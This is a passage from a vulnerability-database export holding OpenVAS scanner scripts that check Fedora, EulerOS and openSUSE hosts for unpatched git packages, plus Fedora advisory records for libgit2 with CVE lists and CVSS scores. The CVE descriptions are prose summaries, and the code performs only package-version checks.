See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875331\");\n script_version(\"$Revision: 14223 $\");\n script_cve_id(\"CVE-2018-19486\", \"CVE-2018-17456\", \"CVE-2018-11233\", \"CVE-2018-11235\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-12-04 08:34:05 +0100 (Tue, 04 Dec 2018)\");\n script_name(\"Fedora Update for git FEDORA-2018-29afefd172\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2018-29afefd172\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SIQD4R3AXAVLC7I56GWWF23JHSCDSW2J\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) announced via the FEDORA-2018-29afefd172 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"affected\", value:\"git on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 
script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"git\", rpm:\"git~2.17.2~2.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:59", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-10-21T00:00:00", "type": "openvas", "title": "Fedora Update for git FEDORA-2018-d5139c4fd6", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-17456", "CVE-2017-15298", "CVE-2018-11233"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310875216", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875216", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_d5139c4fd6_git_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for git FEDORA-2018-d5139c4fd6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875216\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-21 07:28:04 +0200 (Sun, 21 Oct 2018)\");\n script_cve_id(\"CVE-2018-17456\", \"CVE-2018-11233\", \"CVE-2018-11235\", \"CVE-2017-15298\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for git FEDORA-2018-d5139c4fd6\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"git on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-d5139c4fd6\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/D4P3N2PXTUEO4ANXPE6ILEE565P22K5N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"git\", rpm:\"git~2.14.5~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-27T18:34:18", "description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for git (EulerOS-SA-2019-1420)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2324", "CVE-2018-11235", "CVE-2018-17456", "CVE-2017-14867", "CVE-2017-1000117", "CVE-2014-9938", "CVE-2016-2315", "CVE-2015-7545"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220191420", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220191420", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2019.1420\");\n script_version(\"2020-01-23T11:44:01+0000\");\n script_cve_id(\"CVE-2014-9938\", \"CVE-2015-7545\", \"CVE-2016-2315\", \"CVE-2016-2324\", \"CVE-2017-1000117\", \"CVE-2017-14867\", \"CVE-2018-11235\", \"CVE-2018-17456\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 11:44:01 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 11:44:01 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for git (EulerOS-SA-2019-1420)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROSVIRT-3\\.0\\.1\\.0\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2019-1420\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2019-1420\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'git' package(s) announced via the EulerOS-SA-2019-1420 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. 
With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs 'git clone --recurse-submodules' because submodule 'names' are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with '../' in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.(CVE-2018-11235)\n\nA shell command injection flaw related to the handling of 'ssh' URLs has been discovered in Git. An attacker could use this flaw to execute shell commands with the privileges of the user running the Git client, for example, when performing a 'clone' action on a malicious repository or a legitimate repository containing a malicious commit.(CVE-2017-1000117)\n\nGit before 2.10.5, 2.11.x before 2.11.4, 2.12.x before 2.12.5, 2.13.x before 2.13.6, and 2.14.x before 2.14.2 uses unsafe Perl scripts to support subcommands such as cvsserver, which allows attackers to execute arbitrary OS commands via shell metacharacters in a module name. The vulnerable code is reachable via git-shell even without CVS support.(CVE-2017-14867)\n\nIt was found that the git-prompt.sh script shipped with git failed to correctly handle branch names containing special characters. A specially crafted git repository could use this flaw to execute arbitrary commands if a user working with the repository configured their shell to include repository information in the prompt.(CVE-2014-9938)\n\nAn integer truncation flaw and an integer overflow flaw, both leading to a heap-based buffer overflow, were found in the way Git processed certain path information. A remote attacker could create a specially crafted Git repository that would cause a Git client or server to crash or, possibly, execute arbitrary code.(CVE-2016-2324)\n\nA flaw was found in the way the git-remote-ext helper processed certain URLs. 
If a user had Git configured to automatically clone submodules from untrusted repositories, an attacker could inject commands into the URL of a submodule, allowing them to execute arbitrary code on the user's system.(CVE-2015-7545)\n\nGit before 2.14.5, 2.15.x before 2.15.3, 2.16.x before 2.16.5, 2.17.x before 2.17.2, 2.18.x before 2.18.1, and 2.19.x before 2.19.1 allows remote code execution during processing of a recursive 'git clone' of a superproject if a .gitmodules file has a URL field beginning with a '-' character.(CVE-2018-17456)\n\nAn in ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'git' package(s) on Huawei EulerOS Virtualization 3.0.1.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROSVIRT-3.0.1.0\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~1.8.3.1~20.h1\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"perl-Git\", rpm:\"perl-Git~1.8.3.1~20.h1\", rls:\"EULEROSVIRT-3.0.1.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-08T16:44:24", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2020-05-02T00:00:00", "type": "openvas", "title": "openSUSE: Security Advisory for git (openSUSE-SU-2020:0598-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-1387", "CVE-2019-1350", "CVE-2019-1351", "CVE-2018-11235", "CVE-2018-17456", 
"CVE-2019-1349", "CVE-2017-15298", "CVE-2020-5260", "CVE-2020-11008", "CVE-2018-11233", "CVE-2019-1353", "CVE-2019-19604", "CVE-2019-1348", "CVE-2019-1354", "CVE-2019-1352"], "modified": "2020-05-07T00:00:00", "id": "OPENVAS:1361412562310853136", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310853136", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.853136\");\n script_version(\"2020-05-07T07:41:43+0000\");\n script_cve_id(\"CVE-2017-15298\", \"CVE-2018-11233\", \"CVE-2018-11235\", \"CVE-2018-17456\", \"CVE-2019-1348\", \"CVE-2019-1349\", \"CVE-2019-1350\", \"CVE-2019-1351\", \"CVE-2019-1352\", \"CVE-2019-1353\", \"CVE-2019-1354\", \"CVE-2019-1387\", \"CVE-2019-19604\", \"CVE-2020-11008\", \"CVE-2020-5260\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-05-07 07:41:43 +0000 (Thu, 07 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-05-02 03:00:59 +0000 (Sat, 02 May 2020)\");\n script_name(\"openSUSE: Security Advisory for git (openSUSE-SU-2020:0598-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.1\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2020:0598-1\");\n script_xref(name:\"URL\", value:\"http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00003.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'git'\n package(s) announced via the openSUSE-SU-2020:0598-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for git fixes the following issues:\n\n Security issues fixed:\n\n * 
CVE-2020-11008: Specially crafted URLs may have tricked the credentials\n helper into providing credential information that is not appropriate for\n the protocol in use and host being contacted (bsc#1169936)\n\n git was updated to 2.26.1 (bsc#1169786, jsc#ECO-1628, bsc#1149792)\n\n - Fix git-daemon not starting after conversion from sysvinit to systemd\n service (bsc#1169605).\n\n * CVE-2020-5260: Specially crafted URLs with newline characters could have\n been used to make the Git client send credential information for a\n wrong host to the attacker's site bsc#1168930\n\n git 2.26.0 (bsc#1167890, jsc#SLE-11608):\n\n * 'git rebase' now uses a different backend that is based on the 'merge'\n machinery by default. The 'rebase.backend' configuration variable\n reverts to old behaviour when set to 'apply'\n\n * Improved handling of sparse checkouts\n\n * Improvements to many commands and internal features\n\n git 2.25.2:\n\n * bug fixes to various subcommands in specific operations\n\n git 2.25.1:\n\n * 'git commit' now honors advise.statusHints\n\n * various updates, bug fixes and documentation updates\n\n git 2.25.0\n\n * The branch description ('git branch --edit-description') has been used\n to fill the body of the cover letters by the format-patch command, this\n has been enhanced so that the subject can also be filled.\n\n * A few commands learned to take the pathspec from the standard input\n or a named file, instead of taking it as the command line arguments,\n with the '--pathspec-from-file' option.\n\n * Test updates to prepare for SHA-2 transition continues.\n\n * Redo 'git name-rev' to avoid recursive calls.\n\n * When all files from some subdirectory were renamed to the root\n directory, the directory rename heuristics would fail to detect that as\n a rename/merge of the subdirectory to the root directory, which has been\n corrected.\n\n * HTTP transport had possible allocator/deallocator mismatch, which has\n been corrected.\n\n git 2.24.1:\n\n * 
CVE-2019-1348: The --export-marks option of fast-import is exposed also\n via the in-stream command feature export-marks=... and it allows\n overwriting arbitrary paths (bsc#1158785)\n\n * CVE-2019-1349: on Windows, when submodules are cloned recursively, under\n certain circumstances Git could be fooled into using the same Git\n directory twice (bsc#1158787)\n\n * CVE-2019-1350: Incorrect quoting of command-line arguments allowed\n remote code execution during a recursive clone in conjunction with SSH\n URLs (bsc#1158788)\n\n * CVE-2019-1351: on Windows mistakes drive letters outside of the\n ...\n\n Description truncated. Please see the references for more information.\");\n\n script_tag(name:\"affected\", value:\"'git' package(s) on openSUSE Leap 15.1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"git\", rpm:\"git~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-arch\", rpm:\"git-arch~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-core\", rpm:\"git-core~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-core-debuginfo\", rpm:\"git-core-debuginfo~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-gnome-keyring\", rpm:\"git-credential-gnome-keyring~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-gnome-keyring-debuginfo\", 
rpm:\"git-credential-gnome-keyring-debuginfo~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-libsecret\", rpm:\"git-credential-libsecret~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-credential-libsecret-debuginfo\", rpm:\"git-credential-libsecret-debuginfo~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-cvs\", rpm:\"git-cvs~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-daemon\", rpm:\"git-daemon~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-daemon-debuginfo\", rpm:\"git-daemon-debuginfo~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-debuginfo\", rpm:\"git-debuginfo~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-debugsource\", rpm:\"git-debugsource~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-email\", rpm:\"git-email~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-gui\", rpm:\"git-gui~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-p4\", rpm:\"git-p4~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-svn\", rpm:\"git-svn~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-svn-debuginfo\", rpm:\"git-svn-debuginfo~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-web\", rpm:\"git-web~2.26.1~lp151.4.9.1\", 
rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"gitk\", rpm:\"gitk~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"git-doc\", rpm:\"git-doc~2.26.1~lp151.4.9.1\", rls:\"openSUSELeap15.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:54", "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-19T17:48:53", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: libgit2-0.26.5-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235"], "modified": "2018-07-19T17:48:53", "id": "FEDORA:9106C604A712", "href": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/5GAR2S4GMRIEBQXZU3D6ZDJQTR5C4MZH/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-19T18:06:49", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: libgit2-0.26.5-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235"], "modified": "2018-07-19T18:06:49", "id": "FEDORA:38ABE605715A", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/2DI7CXOAS5SSCDPWYHUDJEDPVLTAFS6H/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T18:41:37", "description": "libgit2 is a portable, pure C implementation of the Git core methods provided 
as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.2}, "published": "2018-08-09T17:42:25", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: libgit2-0.26.6-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235"], "modified": "2018-08-09T17:42:25", "id": "FEDORA:34C3F63D9E40", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/NAFODB7GRTYS4SCIO2GNYOE4NAC7AE3P/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-14T23:31:19", "type": "fedora", "title": "[SECURITY] Fedora 27 Update: libgit2-0.26.7-1.fc27", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-11235", "CVE-2018-17456"], "modified": "2018-10-14T23:31:19", "id": "FEDORA:AD7E26075DAB", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/5GMJJIDNEG42VDOEJZLJOIR6WEXXQGZ5/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "libgit2 is a portable, pure C implementation of the Git core methods provided as a re-entrant linkable library with a solid API, allowing you to write native speed custom Git applications in any language with bindings. 
